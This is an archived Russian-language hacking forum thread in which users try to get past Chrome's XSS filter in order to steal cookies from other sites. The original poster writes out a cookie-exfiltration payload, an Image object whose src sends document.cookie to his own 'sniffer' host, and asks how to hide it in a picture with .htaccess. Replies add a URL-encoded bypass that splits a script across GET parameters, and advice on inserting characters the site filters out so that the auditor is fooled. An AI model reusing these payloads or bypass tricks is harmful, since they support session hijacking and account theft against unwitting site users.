Просмотр полной версии : Обход Chrome XSS пассивка
albseeras
20.02.2012, 01:00
Видел одну тему:
HTML highlight
[LEFT][CODE]
Обход Chrome
и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например
img = new Image(); img.src = "http://s.gif?"+document.cookie;
это мы скрываем расширение .js
и открываем на хосте файлом .htaccess нашу картинку и кукисы наши ,таким образом мы обошли фильтр в хроме.
Теперь осталось поменять урл http://www.htmlcodes.me/images/marquees/flying_bat.gif img = new Image(); img.src = "http://мой_сниффер/image.png?"+document.cookie; - т.е перенаправляю на мой сниффер.
Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie...
Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess?
albseeras
23.02.2012, 01:00
Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter
http://blog.securitee.org/?p=37 (https://hpc.name/redirector.html#http://blog.securitee.org/?p=37) но этот баг уже пофиксили )))
Nick Hander
23.02.2012, 01:00
Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie...
Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess?
Ты .htaccess прописал на своем хосте, и прописал код в картинку с расширением .png. Ты думаешь, вставляя картинку на чужой хост, ты украдешь куки? Как бы не так. То правило в .htaccess действительно для твоего хостинга, а не для хоста, с которого крадешь куки. Для целевого сайта картинка воспринимается как обычная картинка. Включайте мозги и обходите фильтры - будет все у вас "проглатывать" =)
Цитата:
Сообщение от albseeras
Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter
http://blog.securitee.org/?p=37 (https://hpc.name/redirector.html#http://blog.securitee.org/?p=37) но этот баг уже пофиксили )))
смотря где и в каком месте например тут в Parameter Values Value of GET parameter b: существует проверь на Chrome http://securitee-playground.co.cc/fi...;%3C/script%3E (https://hpc.name/redirector.html#http://securitee-playground.co.cc/files/chrome_xss.php?a=%22%3E%3Cscript%3E(/hacker-pro.net/)%3C/script%3E%3Cscript%3E/*//&b=*/alert%281%29;%3C/script%3E%3Cscript%3E/*//&b=*/alert%281%29;%3C/script%3E)
значит код можно выполнить таким вот образом /*//&b=*/alert%281%29;
то есть нужно смотреть в то место где произошла хss атака включай элемент поиска в браузере + мозги
и затачивай под гоогле хроме свой скрипт
Ребята что хром такое позволяет?
albseeras
27.02.2012, 01:00
Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться
alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ???
Цитата:
Сообщение от albseeras
Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться
alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ???
какойто вывод у вас не понятный! какое отношение другой домен имеет к alert(document.cookie), если простой алерт не срабатывает, ищите знаки которые фильтрует сам сайт, и вставляйте их в скрипт, при проходе через фильтр знак отфильтруется , хром увидит несовпадение скрипта в адресной строке и в исходном коде, и пропустит скрипт!
Цитата:
Сообщение от albseeras
Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться
alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ???
ты где то рядом
http://www.securitylab.ru/vulnerability/420496.php (https://hpc.name/redirector.html#http://www.securitylab.ru/vulnerability/420496.php)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot